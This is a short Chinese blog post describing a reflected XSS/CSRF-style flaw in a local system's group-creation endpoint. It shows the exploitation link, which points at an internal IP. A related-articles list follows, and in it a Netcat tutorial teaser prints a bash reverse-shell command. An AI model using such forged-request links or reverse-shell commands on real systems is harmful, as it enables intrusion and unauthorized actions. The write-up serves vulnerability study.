記錄一個反射型XSS漏洞

原創 qq284489030 2020-06-30 15:01

【漏洞發現與分析】

本地有個軟件系統,burpsuite開啓主動掃描,報了個XSS漏洞:

添加羣組功能的接口:

仔細確認,原本是個post:

漏洞是把請求參數放到get鏈接裏,且能成功執行:

【漏洞利用】:

csdn發佈博客,博客內容文字test添加鏈接地址:http://192.168.1.50/admin/group/create/?groupname=13

已登錄漏洞系統、且有創建羣組權限的用戶,在瀏覽器中打開csdn 驗證博客並點擊文字test

創建羣組成功:

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

【安全滲透】sql注入

目錄1. sql 注入1.1 sql 注入 介紹1.2 sql 注入 原理1.3 sql 注入 危害1.4 sql 注入 實現方式2. 環境搭建2.1 vmware虛擬機軟件2.2 靶機(學習使用項目環境)2.3 滲透機(學習攻擊

披着床单的小王子 2020-07-06 18:44:36

第三週任務,利用文件上傳漏洞

0x00 前言 本週主要學習了文件上傳各種姿勢,掌握了常見的黑白名單後綴繞過、文件內容檢查繞過的原理、實現及簡單防護。 0X01 文件上傳校驗姿勢 o 客戶端javascript校驗(一般只校驗後綴名) o 服務端校驗 o 文件頭

欧阳大仙萌萌哒 2020-07-01 04:05:33

信安入門神級書單

《社會工程:安全體系中的人性漏洞》 《Android應用安全防護和逆向分析》 《逆向工程核心原理》 《Metasploit滲透測試魔鬼訓練營》 《鳥哥linux的私房菜》(第三版) 《Linux二進制分析》 《網絡空間

欧阳大仙萌萌哒 2020-07-01 04:05:33

【工具】Netcat(1)基本使用

一.概述 netcat是一款基於tcp/ip協議(c/s模型的)的工具。 netcat的功能包括: 數據傳輸 文件傳輸 建立後門 端口轉發 內外網突破 二.基礎使用方法 創建一個服務器端: nc -l -p [local_po

Hector Will 2020-06-26 09:24:30

【工具】Netcat(2)反彈shell

應用場景:某些拿到服務器權限之後,想要設置一個反彈shell。但是目標服務器上沒有安裝Netcat時。 1.反彈shell(bash) 反彈shell命令:bash -i >& /dev/tcp/ip/port 0>&1 pc接

Hector Will 2020-06-26 09:24:30

XSS詳解(概念+靶場演示)反射型與存儲型的比較與詳細操作

Eichi_ 2020-05-06 18:27:40

【Shiro_exploit】PYTHON報錯解決:ModuleNotFoundError: No module named 'requests'

欧阳大仙萌萌哒 2020-05-05 12:11:26

CSRF 越權區別

qq284489030 2020-04-23 10:09:30

一、文件上傳漏洞 低、中、高三級別 詳解

Eichi_ 2020-04-21 00:36:09

二、文件包含漏洞 低、中 、高三級別詳解(一句話木馬,圖片木馬)

Eichi_ 2020-04-21 00:36:09

近日總結 -- 越權、CSRF、邏輯支付、存儲型 XSS

qq284489030 2020-04-19 09:47:42

TCP劫持下的反彈Shell注入攻擊

Eichi_ 2020-04-01 10:26:51

ARP欺騙攻擊

Eichi_ 2020-04-01 10:26:51

網絡安全基礎與常見攻擊(ARP攻擊、ICMP攻擊、DDOS攻擊、TCP RST攻擊)

Eichi_ 2020-04-01 10:26:51

淺談DHCP欺騙攻擊

Eichi_ 2020-04-01 10:26:51